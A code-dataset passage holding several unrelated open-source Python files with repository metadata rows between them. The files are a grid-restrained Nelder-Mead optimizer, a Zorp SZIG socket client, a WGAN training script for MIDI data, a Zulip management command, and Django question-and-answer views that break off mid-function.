DbgMsgOut("GRNMOPT", "Building initial grid for initial simplex.")
# Side vectors (to the first point)
v=self.simplex[1:,:]-self.simplex[0,:]
if not self.originalGrid:
# Maximal absolute components (bounding box sides)
vmax=abs(v).max(0)
# Maximal bounding box side
vmax_max=vmax.max()
# If any component maximum is 0, set it to vmax value
vmax=where(vmax==0.0, vmax_max, vmax)
# Bounding box dimensions divided by density
return vmax/density
else:
# Shortest side length
lmin=sqrt((v*v).sum(1).min())
# Shortest side length divided by density, uniform across all dimensions
return ones(self.ndim)*lmin/density
def gridRestrain(self, x):
"""
Returns the point on the grid that is closest to *x*.
"""
xgr=round((x-self.z)/self.delta)*self.delta+self.z
return xgr
def sortedSideVectors(self):
"""
Returns a tuple (*vsorted*, *lsorted*) where *vsorted* is an array
holding the simplex side vectors sorted by their length with longest
side first. The first index of the 2-dimensional array is the side
vector index while the second one is the component index. *lsorted*
is a 1-dimensional array of corresponding simplex side lengths.
"""
# Side vectors
v=self.simplex[1:,:]-self.simplex[0,:]
# Get length
l2=(v*v).sum(1)
# Order by length (longest first)
i=argsort(l2, 0, 'mergesort') # shortest first
i=i[-1::-1] # longest first
vsorted=v[i,:]
lsorted=sqrt(l2[i])
return (vsorted, lsorted)
def reshape(self, v=None, Q=None, R=None):
"""
Reshapes simpex side vectors given by rows of *v* into orthogonal sides
with their bounding box bounded in length by *lam* and *Lam* with
respect to the grid density. If *v* is ``None`` it assumes that it is a
product of matrices *Q* and *R*.
Returns a tuple (*vnew*, *l*) where *vnew* holds the reshaped simplex
sides and *l* is the 1-dimensional array of reshaped side lengths.
"""
# Rows are side vectors
# QR decomposition of a matrix with side vectors as columns
if v is not None:
(Q, R)=qr(v.T)
# Get scaling factors and their signs
Rdiag=R.diagonal()
Rsign=sign(Rdiag)
Rsign=where(Rsign!=0, Rsign, 1.0)
# Get side lengths
l=abs(Rdiag)
# Calculate side length bounds
norm_delta=sqrt((self.delta**2).sum())
lower=self.lam*sqrt(self.ndim)*norm_delta/2
upper=self.Lam*sqrt(self.ndim)*norm_delta/2
# Bound side length
l=where(l<=upper, l, upper)
l=where(l>=lower, l, lower)
# Scale vectors
# Vectors are in columns of Q. Therefore transpose Q.
vnew=dot(diag(l*Rsign), Q.T)
return (vnew, l)
def reset(self, x0):
"""
Puts the optimizer in its initial state and sets the initial point to
be the 1-dimensional array or list *x0*. The length of the array
becomes the dimension of the optimization problem
(:attr:`ndim` member).
The initial simplex is built around *x0* by calling the
:meth:`buildSimplex` method with default values for the *rel* and *abs*
arguments.
If *x0* is a 2-dimensional array or list of size
(*ndim*+1) times *ndim* it specifies the initial simplex.
A corresponding grid is created by calling the :meth:`buildGrid` method.
The initial value of the natural logarithm of the simplex side vectors
determinant is calculated and stored.
"""
# Debug message
if self.debug:
DbgMsgOut("GRNMOPT", "Resetting.")
# Make it an array
x0=array(x0)
# Is x0 a point or a simplex?
if x0.ndim==1:
# Point
# Set x now
NelderMead.reset(self, x0)
if self.debug:
DbgMsgOut("GRNMOPT", "Generating initial simplex from initial point.")
sim=self.buildSimplex(x0)
self._setSimplex(sim)
self.delta=self.buildGrid()
self.z=x0
else:
# Simplex or error (handled in _setSimplex())
self._setSimplex(x0)
self.delta=self.buildGrid()
self.z=x0[0,:]
if self.debug:
DbgMsgOut("GRNMOPT", "Using specified initial simplex.")
# Set x to first point in simplex after it was checked in _setSimplex()
Optimizer.reset(self, x0[0,:])
# Reset point moves counter
self.simplexmoves=zeros(self.ndim+1)
# Make x tolerance an array
self.xtol=array(self.xtol)
def run(self):
"""
Runs the optimization algorithm.
"""
# Debug message
if self.debug:
DbgMsgOut("GRNMOPT", "Starting a run at i="+str(self.niter))
# Checks
self.check()
# Reset stop flag
self.stop=False
# Grid-restrain initial simplex
if self.gridRestrainInitial:
for i in range(0, self.ndim+1):
self.simplex[i,:]=self.gridRestrain(self.simplex[i,:])
# Evaluate if needed
if self.simplexf is None:
self.simplexf=zeros(self.npts)
for i in range(0, self.ndim+1):
self.simplexf[i]=self.fun(self.simplex[i,:])
if self.debug:
DbgMsgOut("GRNMOPT", "Initial simplex point i="+str(self.niter)+": f="+str(self.simplexf[i]))
# Loop
while not self.stop:
# Order simplex (best point first)
self.orderSimplex()
# Centroid
xc=self.simplex[:-1,:].sum(0)/self.ndim
# Worst point
xw=self.simplex[-1,:]
fw=self.simplexf[-1]
# Second worst point
xsw=self.simplex[-2,:]
fsw=self.simplexf[-2]
# Best point
xb=self.simplex[0,:]
fb=self.simplexf[0]
# No shrink
shrink=False
# Reflect
xr=self.gridRestrain(xc+(xc-xw)*self.reflect)
fr=self.fun(xr)
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": reflect : f="+str(fr))
if fr<fb:
# Try expansion
xe=self.gridRestrain(xc+(xc-xw)*self.expand)
fe=self.fun(xe)
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": expand : f="+str(fe))
if fe<fr:
# Accept expansion
self.simplex[-1,:]=xe
self.simplexf[-1]=fe
self.simplexmoves[-1]+=1
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted expansion")
else:
# Accept reflection
self.simplex[-1,:]=xr
self.simplexf[-1]=fr
self.simplexmoves[-1]+=1
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted reflection after expansion")
elif fb<=fr and fr<fsw:
# Accept reflection
self.simplex[-1,:]=xr
self.simplexf[-1]=fr
self.simplexmoves[-1]+=1
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted reflection")
elif fsw<=fr and fr<fw:
# Try outer contraction
xo=self.gridRestrain(xc+(xc-xw)*self.outerContract)
fo=self.fun(xo)
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": outer con : f="+str(fo))
if fo<fsw:
# Accept
self.simplex[-1,:]=xo
self.simplexf[-1]=fo
self.simplexmoves[-1]+=1
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted outer contraction")
else:
# Shrink
shrink=True
elif fw<=fr:
# Try inner contraction
xi=self.gridRestrain(xc+(xc-xw)*self.innerContract)
fi=self.fun(xi)
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": inner con : f="+str(fi))
if fi<fsw:
# Accept
self.simplex[-1,:]=xi
self.simplexf[-1]=fi
self.simplexmoves[-1]+=1
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted inner contraction")
else:
# Shrink
shrink=True
# self._checkSimplex()
# self._plotSimplex()
# Reshape, pseudo-expand, and shrink loop
if shrink:
# Normal NM steps failed
# No reshape happened yet
reshaped=False
# Create origin vector and function value
x0=zeros(self.ndim)
f0=0.0
# Check simplex shape
# Simplex is already sorted
(v, l)=self.sortedSideVectors()
# Rows of v are side vectors, need to QR decompose a matrix
# with columns holding side vectors
(Q, R)=qr(v.T)
# Diagonal of R
Rdiag=R.diagonal()
# Grid density norm
norm_delta=sqrt((self.delta**2).sum())
if abs(Rdiag).min()<self.psi*sqrt(self.ndim)*norm_delta/2:
# Shape not good, reshape
(v, l)=self.reshape(Q=Q, R=R)
reshaped=True
# Origin for building the new simplex
x0[:]=self.simplex[0,:]
f0=self.simplexf[0]
# Build new simplex
for i in range(self.ndim):
self.simplex[i+1,:]=self.gridRestrain(v[i,:]+x0)
f=self.fun(self.simplex[i+1,:])
self.simplexf[i+1]=f
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": reshape : f="+str(f))
self.simplexmoves[:]=0
# Do not order simplex here, even if reshape results in a point that improves over x0.
# The algorithm in the paper orders the simplex here. This is not in the sense of the
# Price-Coope-Byatt paper, which introduced pseudo-expand. Therefore do not sort.
# Centroid of the n worst points (or if a reshape took place - n new points)
xcw=self.simplex[1:,:].sum(0)/self.ndim
# Pseudo-expand point
xpe=self.gridRestrain(xb+(self.expand/self.reflect-1.0)*(xb-xcw))
fpe=self.fun(xpe)
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": pseudo exp: f="+str(fpe))
# Check if there is any improvement
if fpe<fb:
# Pseudo-expand point is better than old best point
self.simplex[0,:]=xpe
self.simplexf[0]=fpe
self.simplexmoves[0]+=1
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted pseudo exp")
elif self.simplexf.min()<fb:
# One of the points obtained by reshape is better than old best point
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted reshape")
else:
# No improvement, enter shrink loop
# Even though we had a reshape the reshape did not improve the best point,
# and neither did pseudo-expand. This means that the best point before
# reshape is still the best point.
if not reshaped:
# No reshape yet, reshape now
(v, l)=self.reshape(Q=Q, R=R)
reshaped=True
# Origin for building the new simplex
x0[:]=self.simplex[0,:]
f0=self.simplexf[0]
self.simplexmoves[:]=0
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": reshape")
# This is the first shrink step
shrink_step=0
else:
# This is the second shrink step
# (first one happened at reshape and failed to produce improvement)
shrink_step=1
# Shrink loop
while self.simplexf.min()>=f0:
# Reverse side vectors if this is not the first shrink step
if shrink_step>0:
v=-v
# If not first even shrink step, shrink vectors and check grid
if shrink_step>=2 and shrink_step % 2 == 0:
# Shrink vectors
v=v*self.shrink
l=l*self.shrink
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": shrink vectors")
# Find shortest side vector
i=argsort(l, 0, 'mergesort')
lmin=l[i[0]]
vmin=v[i[0],:]
# Do we need a new grid?
if lmin < self.lam*sqrt(self.ndim)*sqrt((self.delta**2).sum())/2:
# New grid origin
self.z=x0
# New (refined) grid density
vmin_norm=sqrt((vmin**2).sum())/sqrt(self.ndim)
abs_vmin=abs(vmin)
deltaprime=1.0/(250*self.lam*self.ndim)*where(abs_vmin>vmin_norm, abs_vmin, vmin_norm)
# Enforce continuity bound on density
contbound_r=abs(self.z)*self.tau_r
contbound=where(contbound_r>self.tau_a, contbound_r, self.tau_a)
deltanew=where(deltaprime>contbound, deltaprime, contbound)
# Update grid density
self.delta=where(deltanew<self.delta, deltanew, self.delta)
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": refine grid")
# Evaluate points
self.simplex[1:,:]=x0+v
for i in range(self.ndim):
self.simplex[i+1,:]=self.gridRestrain(x0+v[i,:])
f=self.fun(self.simplex[i+1,:])
self.simplexf[i+1]=f
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+(": shrink %1d: f=" % (shrink_step % 2))+str(f))
# self._checkSimplex()
# self._plotSimplex()
# if f0!=self.simplexf[0] or (x0!=self.simplex[0,:]).any():
# raise Exception, "x0, f0 not matching."
# Stopping condition
if (self.checkFtol() and self.checkXtol()) or self.stop:
break
# Increase shrink step counter
shrink_step+=1
# Check stopping condition
if self.checkFtol() and self.checkXtol():
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": simplex x and f tolerance reached, stopping.")
break
# Debug message
if self.debug:
DbgMsgOut("GRNMOPT", "Finished.")
#
# Internal functions for debugging purposes
#
def _checkSimplex(self):
"""
Check if the approximate cost function values corresponding to simplex
points are correct.
"""
for i in range(0, self.ndim+1):
ff=self.simplexf[i]
f=self.fun(self.simplex[i,:], False)
if ff!=f and self.debug:
DbgMsgOut("GRNMOPT", "Simplex consistency broken for member #"+str(i))
raise Exception, ""
def _checkLogDet(self):
"""
Check if the natural logarithm of the simplex side vectors is correct.
"""
(v,l)=self.sortedSideVectors()
vdet=abs(det(v))
DbgMsgOut("GRNMOPT", " logDet="+str(exp(self.logDet))+" vdet="+str(vdet))
if (1.0-exp(self.logDet)/vdet)>1e-3:
raise Exception, DbgMsG("GRNMOPT", "Simplex determinat consistency broken. Relative error: %e" % (1.0-exp(self.logDet)/vdet))
def _plotSimplex(self):
"""
Plot the projection of simplex side vectors to the first two dimensions.
"""
p1=self.simplex[0,:2]
p2=self.simplex[1,:2]
p3=self.simplex[2,:2]
pl.clf()
pl.hold(True)
pl.plot([p1[0]], [p1[1]], 'ro')
pl.plot([p2[0]], [p2[1]], 'go')
pl.plot([p3[0]], [p3[1]], 'bo')
pl.plot([p1[0], p2[0]], [p1[1], p2[1]], 'b')
pl.plot([p1[0], p3[0]], [p1[1], p3[1]], 'b')
pl.axis('equal')
pl.hold(False)
pl.show()
| gpl-3.0 | 1,669,439,199,081,266,000 | 29.594203 | 128 | 0.646508 | false | 2.979301 | false | false | false |
mochrul/zorp | zorpctl/szig.py | 1 | 8178 | ############################################################################
##
## Copyright (c) 2000-2015 BalaBit IT Ltd, Budapest, Hungary
## Copyright (c) 2015-2018 BalaSys IT Ltd, Budapest, Hungary
##
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
## with this program; if not, write to the Free Software Foundation, Inc.,
## 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##
############################################################################
import socket
from zorpctl.SZIGMessages import (
MessageAuthorizeAccept, MessageAuthorizeReject,
MessageGetChild, MessageGetDeadLockCheck,
MessageGetLogLevel, MessageGetLogSpec,
MessageGetSibling, MessageGetValue,
MessageReload, MessageReloadResult,
MessageSetDeadLockCheck, MessageSetLogLevel,
MessageSetLogSpec, MessageStopSession
)
from zorpctl.ZorpctlConf import ZorpctlConfig
class Response(object):
def __init__(self, succeeded, value = None):
self.is_succeeded = succeeded
self.value = value
class ResponseDeadlockCheck(Response):
def isSet(self):
return self.value == "1"
class Handler(object):
"""
Class created for handling messages sent by Szig to Zorp
and receiving answer from Zorp
"""
_success_prefix = "OK "
_fail_prefix = "FAIL "
def __init__(self, server_address):
self.max_command_length = 4096
self.response_length = 4096
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.server_address = server_address
try:
self.socket.connect(self.server_address)
except IOError as e:
e.message = "Socket not found, %s" % server_address
raise e
def talk(self, message):
"""
Sends an instance of Message and
returns the response as Response class
"""
self.send(message)
return self.recv()
def send(self, message):
"""
Sending a message to Zorp.
Messages can be derived from abstract Message class.
"""
self._write_request(str(message))
def recv(self):
"""
Returns an instance of Response class.
"""
resp = self._read_response()
return Response(self._isSucceeded(resp), self._cutPrefix(resp))
def _write_request(self, request):
"""
Writing a command message to a Unix Domain Socket
to communicate with Zorp.
Raises SZIGError if not all the data has been sent.
SZIGError value is a tuple of sent/all
"""
request_length = len(request)
if request_length > self.max_command_length:
raise SZIGError("Given request is longer than %s" % self.max_command_length)
sent_data_length = self.socket.send(request)
if sent_data_length < request_length:
msg = "There was an error while sending the request (%s/%s)!" % (sent_data_length, request_length)
raise SZIGError(msg, (sent_data_length, request_length))
def _read_response(self, resp_len = None):
"""
Reading from a Unix Domain Socket
to communicate with Zorp.
"""
if not resp_len:
resp_len = self.response_length
if resp_len < 1:
raise SZIGError("Response length should be greater than 0")
response = self.socket.recv(resp_len)
if not response:
raise SZIGError("There was an error while receiving the answer!")
return response[:-1] if response[-1:] == '\n' else response
def _isSucceeded(self, response):
"""
Method for checking if Zorp understood
the given request by inspecting the response.
"""
return response[:len(self._success_prefix)] == self._success_prefix
def _cutPrefix(self, string):
"""
Cuts the defined prefix from a string.
"""
if string[:len(self._success_prefix)] == self._success_prefix:
string = string[len(self._success_prefix):]
else:
if string[:len(self._fail_prefix)] == self._fail_prefix:
string = string[len(self._fail_prefix):]
return string
class SZIG(object):
def __init__(self, process_name, handler=None):
ZORPCTLCONF = ZorpctlConfig.Instance()
self.pidfile_dir = ZORPCTLCONF['ZORP_PIDFILEDIR']
if not handler:
handler = Handler
self.handler = handler(self.pidfile_dir + '/zorpctl.' + process_name)
def get_value(self, key):
response = self.handler.talk(MessageGetValue(key))
return None if response.value == "None" else response.value
def get_sibling(self, node):
response = self.handler.talk(MessageGetSibling(node))
return None if response.value == "None" else response.value
def get_child(self, node):
response = self.handler.talk(MessageGetChild(node))
return None if response.value == "None" else response.value
@property
def loglevel(self):
self.handler.send(MessageGetLogLevel())
return int(self.handler.recv().value)
@loglevel.setter
def loglevel(self, value):
self.handler.send(MessageSetLogLevel(value))
if not self.handler.recv().is_succeeded:
raise SZIGError("Log level has not been set.")
@property
def logspec(self):
self.handler.send(MessageGetLogSpec())
return self.handler.recv().value
@logspec.setter
def logspec(self, value):
"""
Setting LOGSPEC expecting a log specification
string as value
"""
self.handler.send(MessageSetLogSpec(value))
if not self.handler.recv().is_succeeded:
raise SZIGError("Log specification has not been set.")
@property
def deadlockcheck(self):
self.handler.send(MessageGetDeadLockCheck())
dlc = self.handler.recv()
dlc.__class__ = ResponseDeadlockCheck
return dlc.isSet()
@deadlockcheck.setter
def deadlockcheck(self, value):
"""
Sets Deadlock Check, expects a boolean as value.
"""
self.handler.talk(MessageSetDeadLockCheck(value))
def reload(self):
self.handler.talk(MessageReload())
def reload_result(self):
result = self.handler.talk(MessageReloadResult())
return result.is_succeeded
def stop_session(self, instance):
response = self.handler.talk(MessageStopSession(instance))
if not response.is_succeeded:
raise SZIGError("Session stop failed! Response was: %s" % response.value)
def authorize_accept(self, session_id, description):
response = self.handler.talk(MessageAuthorizeAccept(session_id, description))
if not response.is_succeeded:
raise SZIGError(response.value)
return response.value
def authorize_reject(self, session_id, description):
response = self.handler.talk(MessageAuthorizeReject(session_id, description))
if not response.is_succeeded:
raise SZIGError(response.value)
return response.value
def stop_session(self, session_id):
response = self.handler.talk(MessageStopSession(session_id))
if not response.is_succeeded:
raise SZIGError(response.value)
return response.value
class SZIGError(Exception):
"""
Exception Class created for Szig specific errors.
"""
def __init__(self, msg, value = None):
self.msg = msg
self.value = value
def __str__(self):
return self.msg + repr(self.value)
| gpl-2.0 | -1,081,902,390,154,030,700 | 32.793388 | 110 | 0.627782 | false | 4.124054 | false | false | false |
xi-studio/anime | src/gan_midi.py | 1 | 8075 | import os, sys
sys.path.append(os.getcwd())
import time
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import sklearn.datasets
import tensorflow as tf
import tflib as lib
import tflib.ops.linear
import tflib.ops.conv2d
import tflib.ops.batchnorm
import tflib.ops.deconv2d
import tflib.save_images
import tflib.midi
import tflib.plot
MODE = 'wgan-gp' # dcgan, wgan, or wgan-gp
DIM = 30 # Model dimensionality
BATCH_SIZE = 10 # Batch size
CRITIC_ITERS = 5 # For WGAN and WGAN-GP, number of critic iters per gen iter
LAMBDA = 10 # Gradient penalty lambda hyperparameter
ITERS = 200000 # How many generator iterations to train for
OUTPUT_DIM = 100*88 # Number of pixels in MNIST (28*28)
lib.print_model_settings(locals().copy())
def LeakyReLU(x, alpha=0.2):
return tf.maximum(alpha*x, x)
def ReLULayer(name, n_in, n_out, inputs):
output = lib.ops.linear.Linear(
name+'.Linear',
n_in,
n_out,
inputs,
initialization='he'
)
return tf.nn.relu(output)
def LeakyReLULayer(name, n_in, n_out, inputs):
output = lib.ops.linear.Linear(
name+'.Linear',
n_in,
n_out,
inputs,
initialization='he'
)
return LeakyReLU(output)
def Generator(n_samples, noise=None):
if noise is None:
noise = tf.random_normal([n_samples, 128])
output = lib.ops.linear.Linear('Generator.Input', 128, 13*11*4*DIM, noise)
if MODE == 'wgan':
output = lib.ops.batchnorm.Batchnorm('Generator.BN1', [0], output)
output = tf.nn.relu(output)
output = tf.reshape(output, [-1, 4*DIM, 13, 11])
output = lib.ops.deconv2d.Deconv2D('Generator.2', 4*DIM, 2*DIM, 5, output)
if MODE == 'wgan':
output = lib.ops.batchnorm.Batchnorm('Generator.BN2', [0,2,3], output)
output = tf.nn.relu(output)
output = output[:,:,:25,:]
output = lib.ops.deconv2d.Deconv2D('Generator.3', 2*DIM, DIM, 5, output)
if MODE == 'wgan':
output = lib.ops.batchnorm.Batchnorm('Generator.BN3', [0,2,3], output)
output = tf.nn.relu(output)
output = lib.ops.deconv2d.Deconv2D('Generator.5', DIM, 1, 5, output)
output = tf.nn.sigmoid(output)
return tf.reshape(output, [-1, OUTPUT_DIM])
def Discriminator(inputs):
output = tf.reshape(inputs, [-1, 1, 100, 88])
output = lib.ops.conv2d.Conv2D('Discriminator.1',1,DIM,5,output,stride=2)
output = LeakyReLU(output)
output = lib.ops.conv2d.Conv2D('Discriminator.2', DIM, 2*DIM, 5, output, stride=2)
if MODE == 'wgan':
output = lib.ops.batchnorm.Batchnorm('Discriminator.BN2', [0,2,3], output)
output = LeakyReLU(output)
output = lib.ops.conv2d.Conv2D('Discriminator.3', 2*DIM, 4*DIM, 5, output, stride=2)
if MODE == 'wgan':
output = lib.ops.batchnorm.Batchnorm('Discriminator.BN3', [0,2,3], output)
output = LeakyReLU(output)
output = tf.reshape(output, [-1, 13*11*4*DIM])
output = lib.ops.linear.Linear('Discriminator.Output', 13*11*4*DIM, 1, output)
return tf.reshape(output, [-1])
real_data = tf.placeholder(tf.float32, shape=[BATCH_SIZE, OUTPUT_DIM])
fake_data = Generator(BATCH_SIZE)
disc_real = Discriminator(real_data)
disc_fake = Discriminator(fake_data)
gen_params = lib.params_with_name('Generator')
disc_params = lib.params_with_name('Discriminator')
if MODE == 'wgan':
gen_cost = -tf.reduce_mean(disc_fake)
disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)
gen_train_op = tf.train.RMSPropOptimizer(
learning_rate=5e-5
).minimize(gen_cost, var_list=gen_params)
disc_train_op = tf.train.RMSPropOptimizer(
learning_rate=5e-5
).minimize(disc_cost, var_list=disc_params)
clip_ops = []
for var in lib.params_with_name('Discriminator'):
clip_bounds = [-.01, .01]
clip_ops.append(
tf.assign(
var,
tf.clip_by_value(var, clip_bounds[0], clip_bounds[1])
)
)
clip_disc_weights = tf.group(*clip_ops)
elif MODE == 'wgan-gp':
gen_cost = -tf.reduce_mean(disc_fake)
disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)
alpha = tf.random_uniform(
shape=[BATCH_SIZE,1],
minval=0.,
maxval=1.
)
differences = fake_data - real_data
interpolates = real_data + (alpha*differences)
gradients = tf.gradients(Discriminator(interpolates), [interpolates])[0]
slopes = tf.sqrt(tf.reduce_sum(tf.square(gradients), reduction_indices=[1]))
gradient_penalty = tf.reduce_mean((slopes-1.)**2)
disc_cost += LAMBDA*gradient_penalty
gen_train_op = tf.train.AdamOptimizer(
learning_rate=1e-4,
beta1=0.5,
beta2=0.9
).minimize(gen_cost, var_list=gen_params)
disc_train_op = tf.train.AdamOptimizer(
learning_rate=1e-4,
beta1=0.5,
beta2=0.9
).minimize(disc_cost, var_list=disc_params)
clip_disc_weights = None
elif MODE == 'dcgan':
gen_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(
disc_fake,
tf.ones_like(disc_fake)
))
disc_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(
disc_fake,
tf.zeros_like(disc_fake)
))
disc_cost += tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(
disc_real,
tf.ones_like(disc_real)
))
disc_cost /= 2.
gen_train_op = tf.train.AdamOptimizer(
learning_rate=2e-4,
beta1=0.5
).minimize(gen_cost, var_list=gen_params)
disc_train_op = tf.train.AdamOptimizer(
learning_rate=2e-4,
beta1=0.5
).minimize(disc_cost, var_list=disc_params)
clip_disc_weights = None
# For saving samples
fixed_noise = tf.constant(np.random.normal(size=(20, 128)).astype('float32'))
fixed_noise_samples = Generator(20, noise=fixed_noise)
def generate_image(frame, true_dist):
samples = session.run(fixed_noise_samples)
lib.save_images.save_images(
samples.reshape((20, 100, 88)),
'../data/midi_img/samples_{}.png'.format(frame)
)
# Dataset iterator
train_gen, dev_gen, test_gen = lib.midi.load(BATCH_SIZE, BATCH_SIZE)
def inf_train_gen():
while True:
for images,targets in train_gen():
yield images
# Train loop
saver = tf.train.Saver()
with tf.device('/gpu:0'):
with tf.Session() as session:
session.run(tf.initialize_all_variables())
gen = inf_train_gen()
for iteration in xrange(ITERS):
start_time = time.time()
if iteration > 0:
_ = session.run(gen_train_op)
if MODE == 'dcgan':
disc_iters = 1
else:
disc_iters = CRITIC_ITERS
for i in xrange(disc_iters):
_data = gen.next()
_disc_cost, _ = session.run(
[disc_cost, disc_train_op],
feed_dict={real_data: _data}
)
if clip_disc_weights is not None:
_ = session.run(clip_disc_weights)
lib.plot.plot('train disc cost', _disc_cost)
lib.plot.plot('time', time.time() - start_time)
# Calculate dev loss and generate samples every 100 iters
if iteration % 100 == 99:
dev_disc_costs = []
for images,_ in dev_gen():
_dev_disc_cost = session.run(
disc_cost,
feed_dict={real_data: images}
)
dev_disc_costs.append(_dev_disc_cost)
lib.plot.plot('dev disc cost', np.mean(dev_disc_costs))
if iteration % 1000 == 999:
generate_image(iteration, _data)
saver.save(session, '../data/model/midi_model', global_step=iteration)
# Write logs every 100 iters
if (iteration < 5) or (iteration % 100 == 99):
lib.plot.flush()
lib.plot.tick()
| mit | 3,840,381,744,454,263,300 | 30.29845 | 88 | 0.600495 | false | 3.185404 | false | false | false |
rishig/zulip | zilencer/management/commands/calculate_first_visible_message_id.py | 7 | 1109 | from typing import Any
from django.core.management.base import CommandParser
from zerver.lib.management import ZulipBaseCommand
from zerver.lib.message import maybe_update_first_visible_message_id
from zerver.models import Realm
class Command(ZulipBaseCommand):
help = """Calculate the value of first visible message ID and store it in cache"""
def add_arguments(self, parser: CommandParser) -> None:
self.add_realm_args(parser)
parser.add_argument(
'--lookback-hours',
dest='lookback_hours',
type=int,
help="Period a bit larger than that of the cron job that runs "
"this command so that the lookback periods are sure to overlap.",
required=True,
)
def handle(self, *args: Any, **options: Any) -> None:
target_realm = self.get_realm(options)
if target_realm is None:
realms = Realm.objects.all()
else:
realms = [target_realm]
for realm in realms:
maybe_update_first_visible_message_id(realm, options['lookback_hours'])
| apache-2.0 | -6,301,169,526,633,900,000 | 32.606061 | 86 | 0.64202 | false | 4.169173 | false | false | false |
amirnissim/okqa | qa/views.py | 1 | 9701 | import json
from django.http import HttpResponse, HttpResponseForbidden
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
from django.views.decorators.http import require_POST
from django.template.context import RequestContext
from django.contrib.auth.decorators import login_required
from django.utils.translation import ugettext as _
from django.contrib.syndication.views import Feed
from django.utils.feedgenerator import Atom1Feed
from django.contrib import messages
from django.conf import settings
from django.views.generic.detail import SingleObjectTemplateResponseMixin, BaseDetailView
from qa.forms import AnswerForm, QuestionForm
from .models import *
from qa.mixins import JSONResponseMixin
from user.views import edit_profile
# the order options for the list views
ORDER_OPTIONS = {'date': '-created_at', 'rating': '-rating'}
class JsonpResponse(HttpResponse):
def __init__(self, data, callback, *args, **kwargs):
jsonp = "%s(%s)" % (callback, json.dumps(data))
super(JsonpResponse, self).__init__(
content=jsonp,
content_type='application/javascript',
*args, **kwargs)
def questions(request, entity_slug=None, entity_id=None, tags=None):
"""
list questions ordered by number of upvotes
"""
# TODO: cache the next lines
if entity_id:
entity = Entity.objects.get(pk=entity_id)
else:
entity = Entity.objects.get(slug=entity_slug)
questions = Question.on_site.filter(entity=entity)
context = {'entity': entity}
order_opt = request.GET.get('order', 'rating')
order = ORDER_OPTIONS[order_opt]
if tags:
tags_list = tags.split(',')
questions = questions.filter(tags__name__in=tags_list)
context['current_tags'] = tags_list
questions = questions.order_by(order)
# TODO: revive the tags!
# context['tags'] = TaggedQuestion.on_site.values('tag__name').annotate(count=Count("tag"))
context['questions'] = questions
context['by_date'] = order_opt == 'date'
context['by_rating'] = order_opt == 'rating'
return render(request, "qa/question_list.html", RequestContext(request, context))
class QuestionDetail(JSONResponseMixin, SingleObjectTemplateResponseMixin, BaseDetailView):
model = Question
template_name = 'qa/question_detail.html'
context_object_name = 'question'
slug_field = 'unislug'
def get_context_data(self, **kwargs):
context = super(QuestionDetail, self).get_context_data(**kwargs)
context['max_length_a_content'] = MAX_LENGTH_A_CONTENT
context['answers'] = self.object.answers.all()
context['entity'] = self.object.entity
can_answer = self.object.can_answer(self.request.user)
context['can_answer'] = can_answer
if can_answer:
try:
user_answer = self.object.answers.get(author=self.request.user)
context['my_answer_form'] = AnswerForm(instance=user_answer)
context['my_answer_id'] = user_answer.id
except self.object.answers.model.DoesNotExist:
context['my_answer_form'] = AnswerForm()
if self.request.user.is_authenticated() and \
not self.request.user.upvotes.filter(question=self.object).exists():
context['can_upvote'] = True
else:
context['can_upvote'] = False
return context
def render_to_response(self, context):
# Look for a 'format=json' GET argument
if self.request.GET.get('format', 'html') == 'json' or self.request.is_ajax():
data = {
'question': {
'subject': self.object.subject,
'content': self.object.content,
'author': self.object.author.username
}
}
return JSONResponseMixin.render_to_response(self, data)
else:
return SingleObjectTemplateResponseMixin.render_to_response(self, context)
@login_required
def post_answer(request, q_id):
context = {}
question = Question.objects.get(id=q_id)
if not question.can_answer(request.user):
return HttpResponseForbidden(_("You must be logged in as a candidate to post answers"))
try:
# make sure the user haven't answered already
answer = question.answers.get(author=request.user)
except question.answers.model.DoesNotExist:
answer = Answer(author=request.user, question=question)
answer.content = request.POST.get("content")
answer.save()
return HttpResponseRedirect(question.get_absolute_url())
@login_required
def post_q_router(request):
user = request.user
if user.is_anonymous():
return HttpResponseRedirect(settings.LOGIN_URL)
else:
profile = user.profile
entity_slug = profile.locality and profile.locality.slug
if entity_slug:
return HttpResponseRedirect(reverse(post_question, args=(entity_slug, )))
else:
# user must set locality
